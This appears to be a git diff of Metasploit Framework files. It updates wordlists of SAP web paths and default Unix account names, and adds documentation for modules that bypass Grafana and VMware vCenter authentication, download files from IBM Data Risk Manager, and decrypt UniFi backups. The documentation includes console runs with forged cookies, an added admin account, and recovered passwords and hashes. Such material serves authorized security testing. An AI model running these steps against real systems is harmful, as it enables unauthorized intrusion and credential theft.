/sap/public/bc/icons_rtl
|
||||
/sap/public/bc/its
|
||||
/sap/public/bc/its/designs
|
||||
/sap/public/bc/its/img
|
||||
/sap/public/bc/its/mimes
|
||||
/sap/public/bc/its/mimes/system/SL/page/hourglass.html
|
||||
/sap/public/bc/its/mobile
|
||||
/sap/public/bc/its/mobile/itsmobile00
|
||||
/sap/public/bc/its/mobile/itsmobile01
|
||||
/sap/public/bc/its/mobile/rfid
|
||||
/sap/public/bc/its/mobile/start
|
||||
/sap/public/bc/its/mobile/test
|
||||
/sap/public/bc/its/scripts
|
||||
/sap/public/bc/jsm
|
||||
/sap/public/bc/NWDEMO_MODEL
|
||||
/sap/public/bc/NW_ESH_TST_AUTO
|
||||
/sap/public/bc/pictograms
|
||||
/sap/public/bc/qgm
|
||||
/sap/public/bc/sec
|
||||
/sap/public/bc/sec/cdc_ext_service
|
||||
/sap/public/bc/sec/oauth2
|
||||
/sap/public/bc/sec/oauth2/client
|
||||
/sap/public/bc/sec/oauth2/client/redirect
|
||||
/sap/public/bc/sec/saml2
|
||||
/sap/public/bc/sicf_login_run
|
||||
/sap/public/bc/themes
|
||||
/sap/public/bc/tmp_wd_mimes
|
||||
/sap/public/bc/trex
|
||||
/sap/public/bc/ui2
|
||||
/sap/public/bc/ui5_ui5
|
||||
/sap/public/bc/ui5_ui5/ILMRWC
|
||||
/sap/public/bc/uics
|
||||
/sap/public/bc/uics/whitelist
|
||||
/sap/public/bc/ur
|
||||
/sap/public/bc/wdtracetool
|
||||
/sap/public/bc/webdynpro
|
||||
/sap/public/bc/webdynpro/adobechallenge
|
||||
/sap/public/bc/webdynpro/adobeChallenge
|
||||
/sap/public/bc/webdynpro/mimes
|
||||
/sap/public/bc/webdynpro/Polling
|
||||
/sap/public/bc/webdynpro/ssr
|
||||
/sap/public/bc/webdynpro/viewdesigner
|
||||
/sap/public/bc/webdynpro/ViewDesigner
|
||||
/sap/public/bc/webicons
|
||||
/sap/public/bc/workflow
|
||||
/sap/public/bc/workflow/shortcut
|
||||
/sap/public/bsp
|
||||
/sap/public/bsp/sap
|
||||
/sap/public/bsp/sap/htmlb
|
||||
/sap/public/bsp/sap/public
|
||||
/sap/public/bsp/sap/public/bc
|
||||
/sap/public/bsp/sap/public/faa
|
||||
/sap/public/bsp/sap/public/FAA
|
||||
/sap/public/bsp/sap/public/graphics
|
||||
/sap/public/bsp/sap/public/graphics/jnet_handler
|
||||
/sap/public/bsp/sap/public/graphics/mimes
|
||||
/sap/public/bsp/sap/public/ISE
|
||||
/sap/public/bsp/sap/public/SEM
|
||||
/sap/public/bsp/sap/system
|
||||
/sap/public/bsp/sap/system_public
|
||||
/sap/public/BusinessSuite
|
||||
/sap/public/BusinessSuite/BCV
|
||||
/sap/public/BusinessSuite/BSSP
|
||||
/sap/public/BusinessSuite/CBESH_ICONS
|
||||
/sap/public/BusinessSuite/CloCo
|
||||
/sap/public/BusinessSuite/TM
|
||||
/sap/public/BusinessSuite/TM/FlashIslands
|
||||
/sap/public/BusinessSuite/TM/Icons
|
||||
/sap/public/BusinessSuite/TM/Icons_rtl
|
||||
/sap/public/E2EALERT
|
||||
/sap/public/ES
|
||||
/sap/public/HRPDV
|
||||
/sap/public/HRPDV/Icons
|
||||
/sap/public/HRRenewal
|
||||
/sap/public/HRRenewal/PB
|
||||
/sap/public/icf_check
|
||||
/sap/public/icf_info
|
||||
/sap/public/icf_info/icr_groups
|
||||
/sap/public/icf_info/icr_urlprefix
|
||||
/sap/public/icf_info/logon_groups
|
||||
/sap/public/icf_info/urlprefix
|
||||
/sap/public/icman
|
||||
/sap/public/icman/ping
|
||||
/sap/public/info
|
||||
/sap/public/LSOFE
|
||||
/sap/public/LSOFE/IconLarge
|
||||
/sap/public/LSOFE/IconLarge/CORBU
|
||||
/sap/public/LSOFE/IconLarge/TRADESHOW
|
||||
/sap/public/LSOFE/Pictogram
|
||||
/sap/public/LSOFE/Pictogram/CORBU
|
||||
/sap/public/LSOFE/Pictogram/TRADESHOW
|
||||
/sap/public/myssocntl
|
||||
/sap/public/opu
|
||||
/sap/public/opu/resources
|
||||
/sap/public/ping
|
||||
/sap/public/PPM
|
||||
/sap/public/PPM/PFM
|
||||
/sap/public/PPM/PFM/BCV
|
||||
/sap/public/PPM/PFM/UI
|
||||
/sap/public/PPM/PRO
|
||||
/sap/wdisp/admin
|
||||
/sap/wdvd
|
||||
/sap/webcuif
|
||||
/sap/webdynpro/sap/hap_main_document
|
||||
/sap/webdynpro/sap/hap_start_page_powl_ui_ess
|
||||
/sap/webdynpro/sap/hap_store_page_powl_ui_mss
|
||||
/sap/webdynpro/sap/hrtmc_employee_profile
|
||||
/sap/webdynpro/sap/hrtmc_rm_maintenance
|
||||
/sap/webdynpro/sap/hrtmc_ta_assessment
|
||||
/sap/webdynpro/sap/hrtmc_ta_dashboard
|
||||
/sap/webdynpro/sap/wd_analyze_config_user
|
||||
/scripts/wgate
|
||||
/servlet/com.sap.admin.Critical.Actio
|
||||
/sim/
|
||||
/sim/config/testdata.jsp
|
||||
/sim/config/testerror.jsp
|
||||
/sim/index.html
|
||||
/SLDStart/plain
|
||||
/SLDStart/secure
|
||||
/socoview
|
||||
/socoview/flddisplay.asp
|
||||
/SQLtrace/index.html
|
||||
/sysconfig
|
||||
/tc/lm/webadmin/clusteradmin
|
||||
/tc.lm.webadmin.endtoend.public.app
|
||||
/teched/test
|
||||
/TestJDBC_Web
|
||||
/TOdbo
|
||||
/top.html
|
||||
/TSapq
|
||||
/TXmla
|
||||
/uddi/
|
||||
/uddiclient
|
||||
/uddiclient/jsps/index.jsp
|
||||
/uddiclient/process/
|
||||
/useradmin
|
||||
/userhome
|
||||
/utl/UsageTypesInfo
|
||||
/VC
|
||||
/vscantest/
|
||||
/webdynpro/dispatcher
|
||||
/webdynpro/dispatcher/
|
||||
/webdynpro/dispatcher/sap.com/grc~accvwdcomp
|
||||
/webdynpro/dispatcher/sap.com/grc~aewebquery
|
||||
/webdynpro/dispatcher/sap.com/grc~ccappcomp
|
||||
/webdynpro/dispatcher/sap.com/grc~ccxsysbe
|
||||
/webdynpro/dispatcher/sap.com/grc~ccxsysbehr
|
||||
/webdynpro/dispatcher/sap.com/grc~ffappcomp
|
||||
/webdynpro/dispatcher/sap.com/pb/pagebuilder
|
||||
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui
|
||||
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl
|
||||
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail
|
||||
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory
|
||||
/webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP
|
||||
/webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
|
||||
/webdynpro/dispatcher/sap.com/tc~wd~tools
|
||||
/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
|
||||
/webdynpro/dispatcher/sap.com/tc~wd~tools/WebDynproConsole
|
||||
/webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
|
||||
/webdynpro/resources/sap.com/
|
||||
/webdynpro/welcome/Welcome.jsp
|
||||
/WSConnector/Config1
|
||||
/WSConnector/Config1?wsdl
|
||||
/WSConnector/Config?wsdl
|
||||
/wsd2wsdl
|
||||
/wsnavigator
|
||||
/wsnavigator/jsps/index.jsp
|
||||
/wsnavigator/jsps/redirect.jsp
|
||||
/wsnavigator/jsps/sendrequest.jsp
|
||||
/wsnavigator/jsps/test.jsp
|
||||
/wssproc/cert
|
||||
/wssproc/plain
|
||||
/wssproc/ssl
|
||||
|
||||
@@ -1,88 +1,131 @@
|
||||
|
||||
4Dgifts
|
||||
EZsetup
|
||||
OutOfBox
|
||||
ROOT
|
||||
abrt
|
||||
adm
|
||||
admin
|
||||
administrator
|
||||
anon
|
||||
_apt
|
||||
arpwatch
|
||||
auditor
|
||||
avahi
|
||||
avahi-autoipd
|
||||
backup
|
||||
bbs
|
||||
beef-xss
|
||||
bin
|
||||
bitnami
|
||||
checkfs
|
||||
checkfsys
|
||||
checksys
|
||||
chronos
|
||||
chrony
|
||||
cmwlogin
|
||||
cockpit-ws
|
||||
colord
|
||||
couchdb
|
||||
cups-pk-helper
|
||||
daemon
|
||||
dbadmin
|
||||
dbus
|
||||
Debian-exim
|
||||
Debian-snmp
|
||||
demo
|
||||
demos
|
||||
diag
|
||||
distccd
|
||||
dni
|
||||
dnsmasq
|
||||
dradis
|
||||
EZsetup
|
||||
fal
|
||||
fax
|
||||
ftp
|
||||
games
|
||||
gdm
|
||||
geoclue
|
||||
gnats
|
||||
gnome-initial-setup
|
||||
gopher
|
||||
gropher
|
||||
guest
|
||||
haldaemon
|
||||
halt
|
||||
hplip
|
||||
inetsim
|
||||
informix
|
||||
install
|
||||
iodine
|
||||
irc
|
||||
jet
|
||||
karaf
|
||||
kernoops
|
||||
king-phisher
|
||||
landscape
|
||||
libstoragemgmt
|
||||
libuuid
|
||||
lightdm
|
||||
list
|
||||
listen
|
||||
lp
|
||||
lpadm
|
||||
lpadmin
|
||||
lxd
|
||||
lynx
|
||||
mail
|
||||
man
|
||||
me
|
||||
messagebus
|
||||
miredo
|
||||
mountfs
|
||||
mountfsys
|
||||
mountsys
|
||||
mysql
|
||||
news
|
||||
noaccess
|
||||
nobody
|
||||
nobody4
|
||||
ntp
|
||||
nuucp
|
||||
nxautomation
|
||||
nxpgsql
|
||||
omi
|
||||
omsagent
|
||||
operator
|
||||
oracle
|
||||
OutOfBox
|
||||
pi
|
||||
polkitd
|
||||
pollinate
|
||||
popr
|
||||
postfix
|
||||
postgres
|
||||
postmaster
|
||||
printer
|
||||
proxy
|
||||
pulse
|
||||
redsocks
|
||||
rfindd
|
||||
rje
|
||||
root
|
||||
ROOT
|
||||
rooty
|
||||
rpc
|
||||
rpcuser
|
||||
rtkit
|
||||
rwhod
|
||||
saned
|
||||
service
|
||||
setroubleshoot
|
||||
setup
|
||||
sgiweb
|
||||
shutdown
|
||||
sigver
|
||||
speech-dispatcher
|
||||
sshd
|
||||
sslh
|
||||
sssd
|
||||
stunnel4
|
||||
sym
|
||||
symop
|
||||
sync
|
||||
@@ -92,22 +135,34 @@ sysadmin
|
||||
sysbin
|
||||
syslog
|
||||
system_admin
|
||||
systemd-bus-proxy
|
||||
systemd-coredump
|
||||
systemd-network
|
||||
systemd-resolve
|
||||
systemd-timesync
|
||||
tcpdump
|
||||
trouble
|
||||
tss
|
||||
udadmin
|
||||
ultra
|
||||
umountfs
|
||||
umountfsys
|
||||
umountsys
|
||||
unix
|
||||
unscd
|
||||
us_admin
|
||||
usbmux
|
||||
user
|
||||
uucp
|
||||
uucpadm
|
||||
uuidd
|
||||
vagrant
|
||||
varnish
|
||||
web
|
||||
webmaster
|
||||
whoopsie
|
||||
www
|
||||
www-data
|
||||
xpdb
|
||||
xpopr
|
||||
zabbix
|
||||
vagrant
|
||||
|
||||
+1321
-1
File diff suppressed because one or more lines are too long
+5635
-894
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,55 @@
|
||||
## Vulnerable Application
|
||||
|
||||
The following list shows the vulnerable versions of Grafana when configured for LDAP or OAuth:
|
||||
|
||||
1. 2.x
|
||||
2. 3.x
|
||||
3. 4.x befroe 4.6.4
|
||||
4. 5.x before 5.2.3
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ``use auxiliary/admin/http/grafana_auth_bypass``
|
||||
3. Do: ``set username <username>`` or ``set cookie <cookie>``
|
||||
5. Do: ``set version``
|
||||
6. Do: ``set rhosts``
|
||||
7. Do: ``set rport``
|
||||
8. Do: ``run``
|
||||
|
||||
## Scenarios
|
||||
|
||||
Example run against Grafana 3.x with username admin:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/admin/http/grafana_auth_bypass
|
||||
msf5 auxiliary(admin/http/grafana_auth_bypass) > show options
|
||||
|
||||
Module options (auxiliary/admin/http/grafana_auth_bypass):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
COOKIE no Decrypt captured cookie
|
||||
RHOSTS 127.0.0.1 yes Address of target
|
||||
RPORT 3000 yes Port of target
|
||||
SSL false yes set SSL/TLS based connection
|
||||
TARGETURI / no Base URL of grafana instance
|
||||
THREADS 1 yes The number of concurrent threads
|
||||
USERNAME no Valid username
|
||||
VERSION 5 yes Grafana version: "2-4" or "5" (Accepted: 2-4, 5)
|
||||
|
||||
msf5 auxiliary(admin/http/grafana_auth_bypass) > set RHOSTS 192.168.202.3
|
||||
RHOSTS => 192.168.202.3
|
||||
msf5 auxiliary(admin/http/grafana_auth_bypass) > set USERNAME Administrator
|
||||
USERNAME => Administrator
|
||||
msf5 auxiliary(admin/http/grafana_auth_bypass) > run
|
||||
|
||||
[*] Running for 192.168.202.3...
|
||||
[+] Encrypted remember cookie: 1bedc565c40b58307afa4672efd72d3c37f02684c2deb0ce0b55594cbce337fc90625356dc232e998f
|
||||
[+] Set following cookies to get access to the grafana instance.
|
||||
[+] grafana_user=Administrator;
|
||||
[+] grafana_remember=a232b98b9365d3d8f7ce253adfb9779f1114131a68cc8cbb4a53ee6f5cb71acfbe25773e95db051021;
|
||||
[+] grafana_sess=4ecdc0c13ebca229;
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
@@ -0,0 +1,36 @@
|
||||
## Vulnerable Application
|
||||
|
||||
IBM Data Risk Manager (IDRM) contains two vulnerabilities that can be chained by an unauthenticated attacker to download arbitrary files off the system.
|
||||
The first is an unauthenticated bypass, followed by a path traversal.
|
||||
This module exploits both vulnerabilities, giving an attacker the ability to download (non-root) files.
|
||||
A downloaded file is zipped, and this module also unzips it before storing it in the database.
|
||||
By default, this module downloads Tomcat's 1application.properties` files, which contains the database password, amongst other sensitive data.
|
||||
At the time of disclosure, this is a 0day. Versions 2.0.3 and 2.0.2 are confirmed to be affected, and the latest 2.0.6 is most likely affected too. Version 2.0.1 is not vulnerable.
|
||||
|
||||
### Vulnerability information
|
||||
For more information about the vulnerability check the advisory at:
|
||||
https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm\_drm/ibm\_drm\_rce.md
|
||||
|
||||
### Setup
|
||||
|
||||
The application is available to download as a Linux virtual appliance from IBM's website. You need to have a valid IBM contract to be able to do so.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Module defaults work very well, you should just need to set `RHOST` and the `FILEPATH` you want to download.
|
||||
|
||||
## Scenarios
|
||||
|
||||
A successful exploit will look like this:
|
||||
|
||||
```
|
||||
msf5 auxiliary(admin/http/ibm_drm_file_download) > run
|
||||
|
||||
[+] 10.9.8.213:8443 - Successfully "stickied" our session ID kmhleyPh
|
||||
[+] 10.9.8.213:8443 - We have obtained a new admin password 28010e88-6ffb-46e9-90d6-2ded732120d1
|
||||
[+] 10.9.8.213:8443 - We're now authenticated as admin!
|
||||
[+] File saved in: /home/conta/.msf4/loot/20200421154045_default_10.9.8.213_IBM_DRM.http_402604.bin
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
- Verify that the file was saved in the location specified.
|
||||
@@ -0,0 +1,125 @@
|
||||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
|
||||
This module bypasses LDAP authentication in VMware vCenter Server's
|
||||
vmdir service to add an arbitrary administrator user. Version 6.7
|
||||
prior to the 6.7U3f update is vulnerable.
|
||||
|
||||
### Setup
|
||||
|
||||
Tested in the wild. No setup notes available at this time, as setup will
|
||||
be specific to target environment.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Follow [Setup](#setup) and [Scenarios](#scenarios).
|
||||
|
||||
## Actions
|
||||
|
||||
### Add
|
||||
|
||||
Add an admin user to the vCenter Server.
|
||||
|
||||
## Options
|
||||
|
||||
### BASE_DN
|
||||
|
||||
If you already have the LDAP base DN, you may set it in this option.
|
||||
|
||||
### USERNAME
|
||||
|
||||
Set this to the username for the new admin user.
|
||||
|
||||
### PASSWORD
|
||||
|
||||
Set this to the password for the new admin user.
|
||||
|
||||
### ConnectTimeout
|
||||
|
||||
You may configure the timeout for LDAP connects if necessary. The
|
||||
default is 10.0 seconds and should be more than sufficient.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### VMware vCenter Server 6.7 virtual appliance on ESXi
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
|
||||
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > options
|
||||
|
||||
Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
BASE_DN no LDAP base DN if you already have it
|
||||
PASSWORD no Password of admin user to add
|
||||
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
||||
RPORT 389 yes The target port
|
||||
USERNAME no Username of admin user to add
|
||||
|
||||
|
||||
Auxiliary action:
|
||||
|
||||
Name Description
|
||||
---- -----------
|
||||
Add Add an admin user
|
||||
|
||||
|
||||
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set rhosts [redacted]
|
||||
rhosts => [redacted]
|
||||
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set username msfadmin
|
||||
username => msfadmin
|
||||
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set password msfadmin
|
||||
password => msfadmin
|
||||
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > run
|
||||
[*] Running module against [redacted]
|
||||
|
||||
[*] Using auxiliary/gather/vmware_vcenter_vmdir_ldap as check
|
||||
[*] Discovering base DN automatically
|
||||
[*] Searching root DSE for base DN
|
||||
dn: cn=DSE Root
|
||||
namingcontexts: dc=vsphere,dc=local
|
||||
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.1
|
||||
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.2
|
||||
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.3
|
||||
supportedcontrol: 1.2.840.113556.1.4.417
|
||||
supportedcontrol: 1.2.840.113556.1.4.319
|
||||
supportedldapversion: 3
|
||||
supportedsaslmechanisms: GSSAPI
|
||||
|
||||
[+] Discovered base DN: dc=vsphere,dc=local
|
||||
[*] Dumping LDAP data from vmdir service at [redacted]:389
|
||||
[+] [redacted]:389 is vulnerable to CVE-2020-3952
|
||||
[*] Storing LDAP data in loot
|
||||
[+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002255_default_[redacted]_VMwarevCenterS_975097.txt
|
||||
[*] Password and lockout policy:
|
||||
dn: cn=password and lockout policy,dc=vsphere,dc=local
|
||||
cn: password and lockout policy
|
||||
enabled: TRUE
|
||||
ntsecuritydescriptor:: [redacted]
|
||||
objectclass: top
|
||||
objectclass: vmwLockoutPolicy
|
||||
objectclass: vmwPasswordPolicy
|
||||
objectclass: vmwPolicy
|
||||
vmwpasswordchangeautounlockintervalsec: [redacted]
|
||||
vmwpasswordchangefailedattemptintervalsec: [redacted]
|
||||
vmwpasswordchangemaxfailedattempts: [redacted]
|
||||
vmwpasswordlifetimedays: [redacted]
|
||||
vmwpasswordmaxidenticaladjacentchars: [redacted]
|
||||
vmwpasswordmaxlength: [redacted]
|
||||
vmwpasswordminalphabeticcount: [redacted]
|
||||
vmwpasswordminlength: [redacted]
|
||||
vmwpasswordminlowercasecount: [redacted]
|
||||
vmwpasswordminnumericcount: [redacted]
|
||||
vmwpasswordminspecialcharcount: [redacted]
|
||||
vmwpasswordminuppercasecount: [redacted]
|
||||
vmwpasswordprohibitedpreviouscount: [redacted]
|
||||
|
||||
[*] Bypassing LDAP auth in vmdir service at [redacted]:389
|
||||
[*] Adding admin user msfadmin with password msfadmin
|
||||
[+] Added user msfadmin, so auth bypass was successful!
|
||||
[+] Added user msfadmin to admin group
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) >
|
||||
```
|
||||
@@ -9,8 +9,6 @@
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/admin/smb/webexec_command```
|
||||
@@ -22,7 +20,7 @@
|
||||
|
||||
## Options
|
||||
|
||||
**FORCE_GUI**
|
||||
### FORCE_GUI
|
||||
|
||||
Uses WMIC to create a GUI
|
||||
|
||||
|
||||
@@ -0,0 +1,78 @@
|
||||
## General Notes
|
||||
|
||||
This module imports an Ubiquiti Unifi configuration file into the database.
|
||||
This is similar to `post/multi/gather/ubiquiti_unifi_backup` only access isn't required,
|
||||
and assumes you already have the file.
|
||||
|
||||
This module is able to take a unf file, from the controller and perform the following actions:
|
||||
|
||||
1. Decrypt the file
|
||||
2. Fix the zip file if a `zip` utility is on the system
|
||||
3. Extract db.gz
|
||||
4. Unzip the db file
|
||||
5. Import the db file
|
||||
|
||||
Or simply pass the db file for import directly.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Have a Ubiquiti Unifi configuration file (db or unf)
|
||||
2. Start `msfconsole`
|
||||
3. `use auxiliary/admin/ubiquiti/ubiquiti_config`
|
||||
4. `set RHOST x.x.x.x`
|
||||
5. `set CONFIG /tmp/file.unf`
|
||||
6. `run`
|
||||
|
||||
## Options
|
||||
|
||||
**RHOST**
|
||||
|
||||
Needed for setting services and items to. This is relatively arbitrary.
|
||||
|
||||
**CONFIG**
|
||||
|
||||
File path to the configuration unf or db file..
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Unf File
|
||||
```
|
||||
resource (unifi_config.rb)> use auxiliary/admin/ubiquiti/ubiquiti_config
|
||||
resource (unifi_config.rb)> set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
resource (unifi_config.rb)> set config /root/.msf4/loot/20190825172544_default_1.1.1.1_ubiquiti.unifi.b_740136.unf
|
||||
config => /root/.msf4/loot/20190825172544_default_1.1.1.1_ubiquiti.unifi.b_740136.unf
|
||||
resource (unifi_config.rb)> run
|
||||
[*] Running module against 127.0.0.1
|
||||
[+] File DECRYPTED. Still needs to be repaired
|
||||
[*] Attempting to repair zip file (this is normal and takes some time)
|
||||
[+] File DECRYPTED and REPAIRED and saved to /tmp/fixed_zip.zip20190825-6283-1merolj.
|
||||
[*] extracting db.gz
|
||||
[*] Converting config BSON to JSON
|
||||
[+] Admin user unifiadmin with email admin@unifi.com found with password hash $6$R6qnBHgF$CHYrf4t.fXu0pcoloju5a85m3ujrjJLhIO.lN1xZqHZPQoUXXsJB98jgtsvt4Qo2/8t3epzbVLiba7Ls7GCVxcV.
|
||||
[+] Radius server: 1.1.1.1:1812 with secret ''
|
||||
[+] Mesh Wifi Network vwire-111117d211c1c1ea password 113b9b872b1114a9111f1a11ae11cdfe
|
||||
[+] SSH user admin found with password lyxGYOF9UalubyyG and hash $6$37uelU/k$EkJuteQiAIP.CrRaJj4xC9gt61n95FJP3fQuQQmE9TqtFKtmIGsV5XSIJI.muBLOMKMkdlsPl8E3BvjJit.F21
|
||||
[+] Config import successful
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
### db File
|
||||
|
||||
```
|
||||
resource (unifi_config.rb)> use auxiliary/admin/ubiquiti/ubiquiti_config
|
||||
resource (unifi_config.rb)> set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf5 auxiliary(admin/ubiquiti/ubiquiti_config) > set config /root/.msf4/loot/db
|
||||
config => /root/.msf4/loot/db
|
||||
msf5 auxiliary(admin/ubiquiti/ubiquiti_config) > run
|
||||
[*] Running module against 127.0.0.1
|
||||
|
||||
[*] Converting config BSON to JSON
|
||||
[+] Admin user unifiadmin with email admin@unifi.com found with password hash $6$R6qnBHgF$CHYrf4t.fXu0pcoloju5a85m3ujrjJLhIO.lN1xZqHZPQoUXXsJB98jgtsvt4Qo2/8t3epzbVLiba7Ls7GCVxcV.
|
||||
[+] Radius server: 1.1.1.1:1812 with secret ''
|
||||
[+] Mesh Wifi Network vwire-111117d211c1c1ea password 113b9b872b1114a9111f1a11ae11cdfe
|
||||
[+] SSH user admin found with password lyxGYOF9UalubyyG and hash $6$37uelU/k$EkJuteQiAIP.CrRaJj4xC9gt61n95FJP3fQuQQmE9TqtFKtmIGsV5XSIJI.muBLOMKMkdlsPl8E3BvjJit.F21
|
||||
[+] Config import successful
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
@@ -1,141 +0,0 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode AIX
|
||||
based password hashes, such as:
|
||||
|
||||
* `DES` based passwords
|
||||
|
||||
Sources of hashes can be found here:
|
||||
[source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Have at least one user with a `des` password in the database
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/analyze/jtr_aix```
|
||||
4. Do: ```run```
|
||||
5. You should hopefully crack a password.
|
||||
|
||||
## Options
|
||||
|
||||
|
||||
**CONFIG**
|
||||
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
|
||||
**CUSTOM_WORDLIST**
|
||||
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
|
||||
**DeleteTempFiles**
|
||||
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
|
||||
**ITERATION_TIMEOUT**
|
||||
|
||||
The max-run-time for each iteration of cracking
|
||||
|
||||
**JOHN_PATH**
|
||||
|
||||
The absolute path to the John the Ripper executable. Default behavior is to search `path` for
|
||||
`john` and `john.exe`.
|
||||
|
||||
**KORELOGIC**
|
||||
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
|
||||
**MUTATE**
|
||||
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
|
||||
* `'@' => 'a'`
|
||||
* `'0' => 'o'`
|
||||
* `'3' => 'e'`
|
||||
* `'$' => 's'`
|
||||
* `'7' => 't'`
|
||||
* `'1' => 'l'`
|
||||
* `'5' => 's'`
|
||||
|
||||
Default is `false`.
|
||||
|
||||
**POT**
|
||||
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
|
||||
**USE_CREDS**
|
||||
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
|
||||
**USE_DB_INFO**
|
||||
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
|
||||
**USE_DEFAULT_WORDLIST**
|
||||
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
|
||||
**USE_HOSTNAMES**
|
||||
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
|
||||
**USE_ROOT_WORDS**
|
||||
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
|
||||
## Scenarios
|
||||
|
||||
Create hashes:
|
||||
|
||||
```
|
||||
creds add user:des_password hash:rEK1ecacw.7.c jtr:des
|
||||
creds add user:des_passphrase hash:qiyh4XPJGsOZ2MEAyLkfWqeQ jtr:des
|
||||
```
|
||||
|
||||
Crack them:
|
||||
|
||||
```
|
||||
[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-1p3x0lx
|
||||
[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-66w3u0
|
||||
[*] Cracking descrypt hashes in normal wordlist mode...
|
||||
Using default input encoding: UTF-8
|
||||
Will run 8 OpenMP threads
|
||||
Press 'q' or Ctrl-C to abort, almost any other key for status
|
||||
0g 0:00:00:00 DONE (2019-02-11 19:29) 0g/s 4206Kp/s 4206Kc/s 4206KC/s scandal..vagrant
|
||||
Session completed
|
||||
[*] Cracking descrypt hashes in single mode...
|
||||
Using default input encoding: UTF-8
|
||||
Will run 8 OpenMP threads
|
||||
Press 'q' or Ctrl-C to abort, almost any other key for status
|
||||
0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 6681Kp/s 6681Kc/s 6681KC/s qt1902..tude1900
|
||||
Session completed
|
||||
[*] Cracking descrypt hashes in incremental mode (Digits)...
|
||||
Using default input encoding: UTF-8
|
||||
Will run 8 OpenMP threads
|
||||
Warning: MaxLen = 20 is too large for the current hash type, reduced to 8
|
||||
Press 'q' or Ctrl-C to abort, almost any other key for status
|
||||
0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 21083Kp/s 21083Kc/s 21083KC/s 73602400..73673952
|
||||
Session completed
|
||||
[*] Cracked Passwords this run:
|
||||
[+] des_password:password
|
||||
[+] des_passphrase:????????se
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(analyze/jtr_aix) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type JtR Format
|
||||
